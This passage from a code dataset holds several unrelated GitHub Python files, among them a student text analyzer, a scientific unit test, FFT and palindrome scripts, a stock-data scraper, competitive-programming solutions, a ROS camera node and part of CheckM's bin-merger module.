of the Wasatch\r\nFormation. Eroded portions of these horizontal\r\nbeds slope gradually upward from the valley floor\r\nand steepen abruptly. Overlying them and extending\r\nto the top of the butte are the much steeper\r\nbuff-to-white beds of the Green River Formation,\r\nwhich are about 300 feet thick.''',\r\n3: '''The monument contains 8198 acres and protects\r\na portion of the largest deposit of freshwater fish\r\nfossils in the world. The richest fossil fish deposits\r\nare found in multiple limestone layers, which lie some\r\n100 feet below the top of the butte. The fossils\r\nrepresent several varieties of perch, as well as\r\nother freshwater genera and herring similar to those\r\nin modern oceans. Other fish such as paddlefish,\r\ngarpike and stingray are also present.'''\r\n}\r\n\r\nusers = [\"bob\", \"ann\", \"mike\", \"liz\"]\r\npassw = [\"123\", \"pass123\", \"password123\", \"pass123\"]\r\n\r\ndash = (\"-\" * 40)\r\nstar = \"*\"\r\ndash1 = \"|\"\r\n\r\nword = []\r\nindexLetter = 0\r\nUpperLatter = 0\r\nLowLetter = 0\r\ntitlecase = 0\r\nUppercaseWords = 0\r\nLowWords = 0\r\n\r\nnumbersList = []\r\nnumbers = ''\r\nSuma = 0\r\n\r\nIndexWorlds = []\r\n\r\nSequenceOfNumbers = 1\r\nLenWords = 0\r\n\r\nLenWordList = []\r\nFinishLIST1 = []\r\nFinishLIST2 = []\r\n\r\n\r\nwhile True:\r\n correctUser = False\r\n\r\n userName = input(\"Username: \")\r\n\r\n for userNum in range(len(users)):\r\n if userName == users[userNum]:\r\n correctUser = True\r\n tmpPass = userNum\r\n print(\"Good usernane\")\r\n break\r\n \r\n if correctUser == True:\r\n password = input(\"Password: \")\r\n \r\n if password == passw[tmpPass]:\r\n print(\"Successful login\")\r\n break\r\n else:\r\n print(\"wrong password, try again\")\r\n \r\n else:\r\n print(\"unregistered user, try again\")\r\n\r\nprint(dash)\r\nprint(\"Welcome to the app,\", userName)\r\nprint(\"We have 3 texts to be analyzed.\")\r\nprint(dash)\r\n\r\n\r\nTextNumberSTR = input(\"Enter a number btw. 1 and 3 to select: \")\r\nTextNumberINT = (int(TextNumberSTR))\r\n\r\nfor words in text[TextNumberINT].split():\r\n word.append (words.strip(\",.:;'\").lower())\r\n lenWord = (len(words))\r\n IndexWorlds.append (lenWord)\r\n\r\n for letter in words.strip(\",.:;'/\\|<>^=0123456789\"):\r\n if letter == letter.upper():\r\n if indexLetter == 0:titlecase += 1\r\n \r\n UpperLatter += 1\r\n\r\n elif letter == letter.lower():\r\n LowLetter += 1\r\n\r\n indexLetter += 1\r\n\r\n if UpperLatter == indexLetter and indexLetter != 0:\r\n UppercaseWords += 1\r\n elif LowLetter == indexLetter and indexLetter != 0:\r\n LowWords += 1\r\n\r\n indexLetter = 0\r\n LowLetter = 0\r\n UpperLatter = 0\r\n\r\nfor number in text[TextNumberINT]:\r\n if '0' <= number <= '9':\r\n numbers += number\r\n else:\r\n if numbers != '':\r\n numbersList.append(int(numbers))\r\n Suma += int(numbers)\r\n numbers = \"\"\r\n\r\nprint(dash)\r\nprint(f\"There are {len(word)} words in the selected text.\")\r\nprint(f\"There are {titlecase} titlecase words.\")\r\nprint(f\"There are {UppercaseWords} uppercase words.\")\r\nprint(f\"There are {LowWords} lowercase words.\")\r\nprint(f\"There are {len(numbersList)} numeric strings.\")\r\nprint(f\"The sum of all the numbers {Suma}\")\r\nprint(dash)\r\nprint(\"\"\"LEN| OCCURENCES |NR.\"\"\")\r\n\r\nIndexWorlds.sort()\r\n\r\nfor number1 in IndexWorlds:\r\n if number1 == SequenceOfNumbers:\r\n LenWords += 1\r\n else:\r\n FinishLIST1.append(SequenceOfNumbers)\r\n FinishLIST2.append(LenWords)\r\n LenWords = 0\r\n SequenceOfNumbers += 1\r\n\r\n if number1 == SequenceOfNumbers:\r\n LenWords += 1\r\n\r\nFinishLIST1.append(SequenceOfNumbers)\r\nFinishLIST2.append(LenWords)\r\n\r\nfor alignment in range(len(FinishLIST1)):\r\n alignment_FinishLIST2 = FinishLIST2[alignment]\r\n print(f\"{FinishLIST1[alignment]:<{2}} | {alignment_FinishLIST2 * star:<{20}}|{FinishLIST2[alignment]:>{0}} \")\r\n\r\n\r\n\r\n\r\n","repo_name":"AdamKushnir/projekt1.py-prvn-projekt-do-Engeto-Online-Python-Akademie-Adam-Ku-nir","sub_path":"první projekt do Engeto.py","file_name":"první projekt do Engeto.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39361214076","text":"import sys\nsys.path.append(\"./build\")\n\ntry:\n import unittest\n import tempfile\nexcept:\n print(\"***********************************************************\")\n print(\"* WARNING!! Couldn't import python unittesting framework! *\")\n print(\"* No python tests have been executed *\")\n print(\"***********************************************************\")\n sys.exit(0)\n\ntry:\n import crpropa as crp\nexcept Exception as e:\n print(\"*** CRPropa import failed\")\n print(type(e), str(e))\n sys.exit(-1)\n\ntry:\n import FieldlineIntegrator as fli\nexcept Exception as e:\n print(\"*** FieldlineIntegrator import failed\")\n print(type(e), str(e))\n sys.exit(-1)\n\nclass testSimpleFieldlineIntegration(unittest.TestCase):\n def runTest(self):\n \n bfield = crp.UniformMagneticField(crp.Vector3d(0,0,1))\n \n #propagation parallel to magnetic field\n integrator = fli.FieldlineIntegrator(bfield, 1e-4, 1*crp.pc, 1*crp.pc, True)\n\n c = crp.Candidate()\n c.current.setPosition(crp.Vector3d(0))\n\n integrator.process(c)\n\n self.assertEqual(c.current.getPosition().x, 0.)\n self.assertEqual(c.current.getPosition().y, 0.)\n self.assertAlmostEqual(c.current.getPosition().z/crp.pc, 1)\n\n #propagation anti-parallel to magnetic field\n integrator.setDirection(False)\n\n c = crp.Candidate()\n c.current.setPosition(crp.Vector3d(0))\n\n integrator.process(c)\n\n self.assertEqual(c.current.getPosition().x, 0.)\n self.assertEqual(c.current.getPosition().y, 0.)\n self.assertAlmostEqual(c.current.getPosition().z/crp.pc, -1)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lukasmerten/CRPropa_FieldLineIntegrator","sub_path":"testFieldlineIntegrator.py","file_name":"testFieldlineIntegrator.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12505577561","text":"import sys\n\nimport numpy as np\nimport tables as tb\nimport matplotlib.pyplot as plt\n\n#from scipy import signal\n\n\ndef getWF(inF, ipm, ievt):\n \"\"\" Get a specific waveform from file \"\"\"\n\n return inF.root.RD.pmtrwf[ievt][ipm]\n\n\ndef check_pmt_fft():\n\n file_name1 = sys.argv[1]\n file_name2 = sys.argv[2]\n\n with tb.open_file(file_name1) as file1, tb.open_file(file_name1) as file2:\n ## just 10 events for now\n for ievt in range(10):\n\n for ipm in range(12):\n\n wf1 = getWF(file1, ipm, ievt)\n wf2 = getWF(file2, ipm, ievt)\n\n zeroed1 = wf1 - np.mean(wf1[:10000])\n zeroed2 = wf2 - np.mean(wf2[:10000])\n\n freq = np.fft.rfftfreq(len(zeroed1), d=25E-9)\n ft1 = np.fft.rfft(zeroed1)\n ft2 = np.fft.rfft(zeroed2)\n\n plt.plot(freq, np.absolute(ft1), label='file1, pmt '+str(ipm))\n plt.plot(freq, np.absolute(ft2), label='file2, pmt '+str(ipm))\n plt.legend()\n plt.show()\n\n\nif __name__ == '__main__':\n check_pmt_fft()\n","repo_name":"carmenromo/Calibration_scripts","sub_path":"fft_check.py","file_name":"fft_check.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9894098723","text":"#\n# curpal.py: looks for current palindromes in the source of Ailihphilia\n#\n# based on one word read in\n\nfrom collections import defaultdict\nimport re\nimport i7\nimport sys\n\nglobal_count = 0\npalcomp = defaultdict(int)\nmy_word = 'eh'\ntrack_nothing = False\n\nif len(sys.argv) > 1: my_word = sys.argv[1]\n\ndef is_palindrome(q):\n return q == q[::-1]\n\ndef scour_file(f):\n this_file = 0\n with open(f) as file:\n for (line_count, line) in enumerate(file, 1):\n l2 = re.sub(\"'\", \"\", line.lower().strip())\n lws = re.split(\"[^a-z]+\", l2)\n ll = len(lws)\n for x in range(0, ll):\n if lws[x] == my_word:\n if x > 0 and is_palindrome(lws[x-1] + lws[x]):\n print(lws[x-1],lws[x], line_count, l2)\n this_file += 1\n palcomp[lws[x-1]] += 1\n if x < ll - 1 and is_palindrome(lws[x] + lws[x+1]):\n print(lws[x], lws[x+1], line_count, l2)\n this_file += 1\n palcomp[lws[x+1]] += 1\n if this_file: print(f, \"found\", this_file, \"palindrome{:s}.\".format(i7.plur(this_file)))\n elif track_nothing: print(f, \"found nothing\")\n return this_file\n\nfor q in i7.i7f['ailihphilia']:\n global_count += scour_file(q)\n\nif global_count: print(\"Total pals found for\", my_word + \":\", global_count)\nelse: sys.exit(\"Nothing found for\", my_word)\n\nones = []\n\nfor q in sorted(palcomp.keys(), key=palcomp.get):\n if palcomp[q] > 1: print(my_word, q, palcomp[q])\n else: ones.append(q)\n\nif len(ones): print(\"Singletons:\", ', '.join(sorted(ones)))","repo_name":"andrewschultz/ailihphilia","sub_path":"utils/curpal.py","file_name":"curpal.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7600362625","text":"import torch\n\nfrom api.endpoints.classification import get_work_scores, get_tag_scores\nfrom api.endpoints.similar import get_similar\nimport torch.nn.functional as F\nfrom schemas.user import UserInfo\nfrom curd.Classification import get_candidate\nfrom database.mongodb import connect_result\n\n\nasync def get_all_dict(temp: UserInfo):\n id = temp.id\n ids = temp.ids\n # 整合所有模型\n work_scores = await get_work_scores(temp)\n similar_scores = await get_similar(temp)\n tag_scores = await get_tag_scores(id)\n cands = await get_candidate(ids)\n\n all_scores = []\n # 将相似度模型的结果与分类模型的结果求和\n for cand in cands:\n scores = {cand: work_scores[cand] + similar_scores[cand]}\n all_scores.append(scores)\n # 重新分类之前的处理\n before = []\n for score in all_scores:\n before.append(list(score.values())[0])\n\n print(before)\n # 重新分类\n final = F.softmax(torch.tensor(before))\n\n # 信息整合到一个字典里\n all_scores_final = [{'id': id}]\n\n for i in range(len(all_scores)):\n tmp = {list(all_scores[i].keys())[0]: final[i].item()}\n all_scores_final.append(tmp)\n\n # if tag_scores['工作变动稳定'] > tag_scores['工作变动频繁']:\n # all_scores_final.append({\"tag\": '工作变动稳定'})\n # elif tag_scores['工作变动稳定'] < tag_scores['工作变动频繁']:\n # all_scores_final.append({\"tag\": '工作变动频繁'})\n\n all_dict = {}\n for dic in all_scores_final:\n all_dict = {**all_dict, **dic}\n\n return all_dict\n\n\nasync def to_mongodb(all_dict):\n result = await connect_result()\n result.insert_one(all_dict)","repo_name":"spumant/fxxk","sub_path":"curd/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"74990241794","text":"from tkinter import *\nfrom sp2txt import microphone\n\nroot = Tk()\nroot.title(\"Abler\")\nroot.geometry(\"500x250+\"+str(root.winfo_screenwidth()-500)+\"+\"+str(root.winfo_screenheight()-250))\nname = Label(root, text=\"Event Viewer : \")\nText = StringVar()\n\ndef Button1(event):\n\tglobal Text\n\tText.set('Event Viewer : ON/OFF button pressed!')\n\tmicrophone()\n\ndef Button2(event):\n\tglobal Text\n\tText.set('Event Viewer : Capslocks pressed!')\n\ndef Button3(event):\n\tglobal Text\n\tText.set('Event Viewer : Button3 pressed!')\n\n#GUI Part\ndef GUI():\n\n\tText.set(\"Event Viewer : \")\n\ttest = Label(root, text=\"\")\n\tname = Label(root, textvariable=Text)\n\tbutton1 = Button(root, text=\"ON/OFF\", height=10, width=15)\n\tbutton2 = Button(root, text=\"CapsLocks\", height=10, width=15)\n\tbutton3 = Button(root, text=\"Button3\", height=10, width=15)\n\tname.grid(row=0, column=0, sticky=W,columnspan = 3)\n\ttest.grid(row=1, column=0)\n\tbutton1.grid(row=2, column=0)\n\tbutton2.grid(row=2, column=1)\n\tbutton3.grid(row=2, column=2)\n\tbutton1.bind(\"\", Button1)\n\tbutton2.bind(\"\", Button2)\n\tbutton3.bind(\"\", Button3)\n\troot.mainloop()\nGUI()","repo_name":"bansal-dhruv/falcons","sub_path":"Keyboard/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35203359089","text":"import sys\nfrom collections import defaultdict, Counter, deque\nfrom itertools import permutations, combinations, product, combinations_with_replacement, groupby, accumulate\nimport operator\nfrom math import sqrt, gcd, factorial\nfrom copy import deepcopy\n# from math import isqrt, prod,comb # python3.8用(notpypy)\n#from bisect import bisect_left,bisect_right\n#from functools import lru_cache,reduce\n#from heapq import heappush,heappop,heapify,heappushpop,heapreplace\n#import numpy as np\n#import networkx as nx\n#from networkx.utils import UnionFind\n#from numba import njit, b1, i1, i4, i8, f8\n#from scipy.sparse import csr_matrix\n#from scipy.sparse.csgraph import shortest_path, floyd_warshall, dijkstra, bellman_ford, johnson, NegativeCycleError\n# numba例 @njit(i1(i4[:], i8[:, :]),cache=True) 引数i4配列、i8 2次元配列,戻り値i1\ndef input(): return sys.stdin.readline().rstrip()\ndef divceil(n, k): return 1+(n-1)//k # n/kの切り上げを返す\ndef yn(hantei, yes='Yes', no='No'): print(yes if hantei else no)\n\nclass PrepereFactorial2: # maxnumまでの階乗を事前計算して、順列、組み合わせ、重複組み合わせを計算するクラス。逆元のテーブルもpow無しで前計算する。maxnumに比べて関数呼び出しが多いならこちら\n def __init__(self, maxnum=3*10**5, mod=10**9+7):\n self.factorial = [1]*(maxnum+1)\n modinv_table = [-1] * (maxnum+1)\n modinv_table[1] = 1\n for i in range(2, maxnum+1):\n self.factorial[i] = (self.factorial[i-1]*i) % mod\n modinv_table[i] = (-modinv_table[mod % i] * (mod // i)) % mod\n self.invfactorial = [1]*(maxnum+1)\n for i in range(1, maxnum+1):\n self.invfactorial[i] = self.invfactorial[i-1]*modinv_table[i] % mod\n self.mod = mod\n\n def permutation(self, n, r):\n return self.factorial[n]*self.invfactorial[n-r] % self.mod\n\n def combination(self, n, r):\n if r < 0 or r > n:\n return 0\n return self.permutation(n, r)*self.invfactorial[r] % self.mod\n\n def combination_with_repetition(self, n, r):\n return self.combination(n+r-1, r)\n\n#https://atcoder.jp/contests/practice2/submissions/16789717\np, g, ig = 998244353, 3, 332748118\nW = [pow(g, (p - 1) >> i, p) for i in range(24)]\niW = [pow(ig, (p - 1) >> i, p) for i in range(24)]\n \ndef fft(k, f):\n for l in range(k, 0, -1):\n d = 1 << l - 1\n U = [1]\n for i in range(d):\n U.append(U[-1] * W[l] % p)\n \n for i in range(1 << k - l):\n for j in range(d):\n s = i * 2 * d + j\n f[s], f[s+d] = (f[s] + f[s+d]) % p, U[j] * (f[s] - f[s+d]) % p\n \ndef ifft(k, f):\n for l in range(1, k + 1):\n d = 1 << l - 1\n for i in range(1 << k - l):\n u = 1\n for j in range(i * 2 * d, (i * 2 + 1) * d):\n f[j+d] *= u\n f[j], f[j+d] = (f[j] + f[j+d]) % p, (f[j] - f[j+d]) % p\n u = u * iW[l] % p\n \ndef convolution(a, b):\n n0 = len(a) + len(b) - 1\n k = (n0).bit_length()\n n = 1 << k\n a = a + [0] * (n - len(a))\n b = b + [0] * (n - len(b))\n fft(k, a), fft(k, b)\n for i in range(n):\n a[i] = a[i] * b[i] % p\n ifft(k, a)\n invn = pow(n, p - 2, p)\n for i in range(n0):\n a[i] = a[i] * invn % p\n del a[n0:]\n return a\n\n\ndef main():\n mod = 10**9+7\n mod2 = 998244353\n r, g, b, k = map(int, input().split())\n x, y, z = map(int, input().split())\n pf = PrepereFactorial2(6*10**5+1, mod2)\n rless = k-y\n gless = k-z\n bless = k-x\n \"\"\"\n 問題の条件を以下のように言い換える。\n\n 赤をk-y個未満選ぶ・緑をk-z個未満選ぶ・青をk-x個未満選ぶの3条件を\n 全て満たさない。\n \n 包除原理により、k個選ぶ全体から、上記条件を1個以上満たす選び方を引いて、条件を2個以上満たす選び方を足して、条件を3個満たす選び方を引けばよい。\n \"\"\"\n #k個選ぶ全体\n ans = pf.combination(r+g+b, k) \n rcomb = [0]*rless\n gcomb = [0]*gless\n bcomb = [0]*bless\n #条件を1個以上満たす選び方\n for i in range(rless):\n a = pf.combination(r, i)\n rcomb[i] = a\n ans -= a*pf.combination(g+b, k-i)\n for i in range(gless):\n a = pf.combination(g, i)\n gcomb[i] = a\n ans -= a*pf.combination(r+b, k-i)\n for i in range(bless):\n a = pf.combination(b, i)\n bcomb[i] = a\n ans -= a*pf.combination(r+g, k-i)\n #条件を2個以上満たす選び方\n if rless and gless:\n rgcomb = convolution(rcomb, gcomb)\n for i in range(rless+gless-1):\n ans += rgcomb[i]*pf.combination(b, k-i)\n if rless and bless:\n rbcomb = convolution(rcomb, bcomb)\n for i in range(rless+bless-1):\n ans += rbcomb[i]*pf.combination(g, k-i)\n if gless and bless:\n gbcomb = convolution(gcomb, bcomb)\n for i in range(gless+bless-1):\n ans += gbcomb[i]*pf.combination(r, k-i)\n #条件を3個満たす選び方\n if rless and gless and bless and rless+gless+bless-3 >= k:\n ans -= convolution(rgcomb[:k+1],bcomb[:k+1])[k]\n print(ans % mod2)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"ansainbdg/my_kyopro_ans","sub_path":"typical_90/065.py","file_name":"065.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23442469331","text":"import sys\nsys.stdin = open('B-small-attempt0.in', 'r')\nsys.stdout = open('B.out','w')\n\nfor p in range(int(input())):\n\tA, B, K = map(int, input().split())\n\tS = 0\n\tfor i in range(A):\n\t\tfor j in range(B):\n\t\t\tif i & j < K:\n\t\t\t\tS += 1\n\tprint(\"Case #%d: %d\" % (p+1, S))\n\t\n\n\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_143/552.py","file_name":"552.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33644084518","text":"buy = int(input())\r\nresult = 0\r\nif(buy>2):\r\n for i in range(1,buy+1):\r\n if(i % 3 == 0):\r\n result += 1\r\n while(result % 3 == 0):\r\n x = result // 3\r\n result += x\r\n ez = buy - (3*result)\r\n if(result > 2):\r\n for j in range(1,result+ez+1):\r\n if(j % 3 == 0):\r\n result += 1\r\n\r\n y = result+buy\r\n while(y % 3 == 0):\r\n y += 1\r\n print(y)\r\nelse:\r\n print(buy+result) ","repo_name":"chanasorn1234/Learning-Python","sub_path":"Problem/pyth25.py","file_name":"pyth25.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73990302915","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 13 18:12:35 2022\r\n\r\n@author: 1\r\n\"\"\"\r\ndef legendre(n,m,x):\r\n if n==0:\r\n if m>=1:\r\n return 0\r\n else:\r\n return 1\r\n \r\n \r\n s=np.zeros([n+1,m+1])\r\n \r\n for j in range(0,m+1):\r\n if j==0:\r\n s[0,j]=1\r\n s[1,j]=x\r\n for k in range(1,n):\r\n s[k+1,j]=((2*k+1)*x*s[k,j]-k*s[k-1,j])/(k+1)\r\n \r\n else:\r\n s[0,j]=0\r\n if j==1:\r\n s[1,j]=1\r\n else:\r\n s[1,j]=0\r\n \r\n for k in range(1,n):\r\n s[k+1,j]=(2*k+1)*s[k,j-1]+s[k-1,j]\r\n \r\n r=s[n,m]\r\n \r\n return r\r\n\r\ndef legendregauss(n,m):\r\n if n==0:\r\n return []\r\n\r\n z=[]\r\n error=1e-14\r\n h=n**(-2)\r\n a=-1\r\n b=a+h\r\n \r\n for k in range(1,n-m+1):\r\n \r\n legendre_a=legendre(n,m,a)\r\n legendre_b=legendre(n,m,b)\r\n while(legendre_a*legendre_b>0):\r\n a=b\r\n legendre_a=legendre_b\r\n \r\n b=a+h\r\n legendre_b=legendre(n,m,b)\r\n \r\n x=(a+b)*0.5\r\n xright=b\r\n while(np.abs(x-xright)>error):\r\n xright=x\r\n x=x-legendre(n,m,x)/legendre(n,m+1,x)\r\n \r\n z.append(x)\r\n a=x+h\r\n b=a+h\r\n \r\n return np.array(z)","repo_name":"wangnianrui2333/-","sub_path":"legendregauss.py","file_name":"legendregauss.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40991929741","text":"#!/usr/bin/env python\n\n\n\nimport rospy\nimport cv2\nfrom sensor_msgs.msg import Image ############\nfrom cv_bridge import CvBridge, CvBridgeError ##############\nfrom std_msgs.msg import String ############### \n\n\ndef camera_NSF():\n while True:\n pub = rospy.Publisher(\"camera_topic\", Image, queue_size=10) ######'camera_topic' topic,message type is IMAGE\n rospy.init_node('camera', anonymous=True) ######## name of the node is \"camera\"\n rate=rospy.Rate(10) ###########\n \n ret, frame = cap.read()\n cv2.imshow('video', frame)\n cv2.waitKey(3)\n print('sending frames cont.......')\n \n\n \n bridge= CvBridge() ###############\n ros_image = bridge.cv2_to_imgmsg(frame, \"bgr8\") ##############\n \n \n \n pub.publish(ros_image) ######\n rate.sleep()#########\n \n\nif __name__ == '__main__':\n\n\n cap = cv2.VideoCapture(0)\n \n try:\n camera_NSF()\n \n \n except rospy.ROSInterruptException:\n pass\n","repo_name":"naseef139/Robot-Assistant-Dev-Bank","sub_path":"face_detector/camera_node.py","file_name":"camera_node.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26369455642","text":"import asyncio\nimport json\nimport re\nfrom heapq import nlargest\nfrom typing import Dict, List\n\nimport aiohttp\n\nfrom bs4 import BeautifulSoup\n\n\nasync def get_page(url: str) -> str:\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n return await response.text()\n\n\nasync def get_exchange_rate() -> float:\n \"\"\"Return current exchange rate USD to RUB.\"\"\"\n url_cbr = \"http://www.cbr.ru/scripts/XML_daily.asp\"\n page = await get_page(url_cbr)\n page = BeautifulSoup(page, \"lxml\")\n exchange_rate = page.find(id=\"R01235\").find_next(\"value\").get_text()\n return float(exchange_rate.replace(\",\", \".\"))\n\n\nasync def get_companies_from_page(path: str, page: int) -> List:\n \"\"\"Get information about companies from table.\n\n Args:\n path: path to the website.\n page: number of the page we get information from.\n\n Returns:\n List with information about companies (company name, link and growth).\n\n \"\"\"\n start_page = path + \"index/components/s&p_500\"\n base_url = start_page + \" ?p={}\"\n companies = []\n page = BeautifulSoup(await get_page(base_url.format(page)), \"lxml\")\n table = page.find(class_=\"table table-small\")\n\n for row in table.find_all(\"tr\")[1:]:\n name = row.find(\"a\")[\"title\"]\n href = row.find(\"a\")[\"href\"]\n growth = row.find_all(\"td\")[9].text.split()[1]\n companies.append([name, href, float(growth[:-1])])\n return companies\n\n\nasync def page_count(path: str) -> int:\n \"\"\"Return number of pages with tables.\"\"\"\n start_page = path + \"index/components/s&p_500\"\n page = await get_page(start_page)\n page = BeautifulSoup(page, \"lxml\")\n pages = page.find(\"div\", class_=\"finando_paging\").find_all(\"a\")\n return int(pages[-1].text)\n\n\nasync def get_companies_from_all_pages() -> List[List]:\n \"\"\"Collect iformation from all pages using async methods.\"\"\"\n path = \"https://markets.businessinsider.com/\"\n pages = await page_count(path)\n tasks = [get_companies_from_page(path, i) for i in range(1, pages + 1)]\n return await asyncio.gather(*tasks)\n\n\nasync def get_company_info(company: List, exchange_rate: float) -> Dict:\n \"\"\"Parse company page and return dictionary with information.\"\"\"\n start_page = \"https://markets.businessinsider.com\"\n base_url = start_page + company[1]\n page = BeautifulSoup(await get_page(base_url), \"lxml\")\n table = page.find(\"span\", class_=\"price-section__category\")\n code = table.find(\"span\").text[2:]\n table = page.find(class_=\"price-section__current-value\")\n price = float(table.text.replace(\",\", \"\")) * exchange_rate\n script = page.find(\"div\", class_=\"snapshot\").find(\"script\")\n week_low = float(re.findall(r\"low52weeks: (\\d*.\\d*),\", script.string)[0])\n week_high = float(re.findall(r\"high52weeks: (\\d*.\\d*),\", script.string)[0])\n try:\n pe = float(\n page.find(\"div\", class_=\"snapshot\")\n .find_all(class_=\"snapshot__data-item\")[6]\n .text.split()[0]\n )\n except ValueError:\n pe = -1\n return {\n \"name\": company[0],\n \"href\": company[1],\n \"growth\": company[2],\n \"code\": code,\n \"P/E\": pe,\n \"price\": round(price, 2),\n \"potential profit\": round((week_high - week_low) / week_low, 2),\n }\n\n\ndef save_to_json(filename: str, value_name: str, data: List[Dict]) -> None:\n with open(filename + \".json\", \"w\") as file:\n top_10 = [\n {\n \"name\": data[i][\"name\"],\n \"code\": data[i][\"code\"],\n f\"{value_name}\": data[i][value_name],\n }\n for i in range(10)\n ]\n json.dump(top_10, file, indent=4)\n\n\nasync def get_all_information() -> List[Dict]:\n \"\"\"Return information about all companies.\n\n Do it fast because of async method.\n\n \"\"\"\n companies = await get_companies_from_all_pages()\n exchange_rate = await get_exchange_rate()\n tasks = []\n for page in companies:\n for company in page:\n tasks.append(get_company_info(company, exchange_rate))\n return await asyncio.gather(*tasks)\n\n\ndef main() -> None:\n \"\"\"Start point.\"\"\"\n companies_info = asyncio.run(get_all_information())\n save_to_json(\n \"top_growth\",\n \"growth\",\n nlargest(10, companies_info, key=lambda x: x[\"growth\"]),\n )\n save_to_json(\n \"top_PE\",\n \"P/E\",\n nlargest(10, companies_info, key=lambda x: x[\"P/E\"]),\n )\n save_to_json(\n \"top_price\",\n \"price\",\n nlargest(10, companies_info, key=lambda x: x[\"price\"]),\n )\n param = \"potential profit\"\n save_to_json(\n \"top_potential_profit\",\n param,\n nlargest(10, companies_info, key=lambda x: x[param]),\n )\n","repo_name":"Angelina151612/epam_python","sub_path":"hw/hw_10_task_01.py","file_name":"hw_10_task_01.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21020904304","text":"###############################################################################\n#\n# merger.py - identify bins with complementary sets of marker genes\n#\n###############################################################################\n# #\n# This program is free software: you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation, either version 3 of the License, or #\n# (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License #\n# along with this program. If not, see . #\n# #\n###############################################################################\n\nimport os\nimport sys\nimport logging\n\nfrom checkm.common import checkDirExists\nfrom checkm.resultsParser import ResultsParser\n\n\nclass Merger():\n def __init__(self):\n self.logger = logging.getLogger()\n\n def run(self, binFiles, outDir, hmmTableFile,\n binIdToModels, binIdToBinMarkerSets,\n minDeltaComp, maxDeltaCont,\n minMergedComp, maxMergedCont):\n checkDirExists(outDir)\n\n self.logger.info(' Comparing marker sets between all pairs of bins.')\n\n # ensure all bins are using the same marker set\n markerGenesI = binIdToBinMarkerSets[list(binIdToBinMarkerSets.keys())[0]].mostSpecificMarkerSet().getMarkerGenes()\n for binIdJ in binIdToBinMarkerSets:\n if markerGenesI != binIdToBinMarkerSets[binIdJ].mostSpecificMarkerSet().getMarkerGenes():\n self.logger.error(' [Error] All bins must use the same marker set to assess potential mergers.')\n sys.exit(0)\n\n # parse HMM information\n resultsParser = ResultsParser(binIdToModels)\n\n # get HMM hits to each bin\n resultsParser.parseBinHits(outDir, hmmTableFile)\n\n # determine union and intersection of marker sets for each pair of bins\n outputFile = os.path.join(outDir, \"merger.tsv\")\n fout = open(outputFile, 'w')\n fout.write('Bin Id 1\\tBin Id 2')\n fout.write('\\tBin 1 completeness\\tBin 1 contamination')\n fout.write('\\tBin 2 completeness\\tBin 2 contamination')\n fout.write('\\tDelta completeness\\tDelta contamination\\tMerger delta')\n fout.write('\\tMerged completeness\\tMerged contamination\\n')\n\n binMarkerHits = resultsParser.results\n binIds = sorted(binMarkerHits.keys())\n for i in range(0, len(binMarkerHits)):\n binIdI = binIds[i]\n\n geneCountsI = binMarkerHits[binIdI].geneCounts(binIdToBinMarkerSets[binIdI].mostSpecificMarkerSet(), binMarkerHits[binIdI].markerHits, True)\n completenessI, contaminationI = geneCountsI[6:8]\n\n for j in range(i + 1, len(binMarkerHits)):\n binIdJ = binIds[j]\n\n geneCountsJ = binMarkerHits[binIdJ].geneCounts(binIdToBinMarkerSets[binIdJ].mostSpecificMarkerSet(), binMarkerHits[binIdJ].markerHits, True)\n completenessJ, contaminationJ = geneCountsJ[6:8]\n\n # merge together hits from both bins and calculate completeness and contamination\n mergedHits = {}\n for markerId, hits in binMarkerHits[binIdI].markerHits.items():\n mergedHits[markerId] = list(hits)\n\n for markerId, hits in binMarkerHits[binIdJ].markerHits.items():\n if markerId in mergedHits:\n mergedHits[markerId].extend(hits)\n else:\n mergedHits[markerId] = hits\n\n geneCountsMerged = binMarkerHits[binIdI].geneCounts(binIdToBinMarkerSets[binIdJ].mostSpecificMarkerSet(), mergedHits, True)\n completenessMerged, contaminationMerged = geneCountsMerged[6:8]\n\n if not (completenessMerged >= minMergedComp and contaminationMerged < maxMergedCont):\n continue\n\n # calculate merged statistics\n deltaComp = completenessMerged 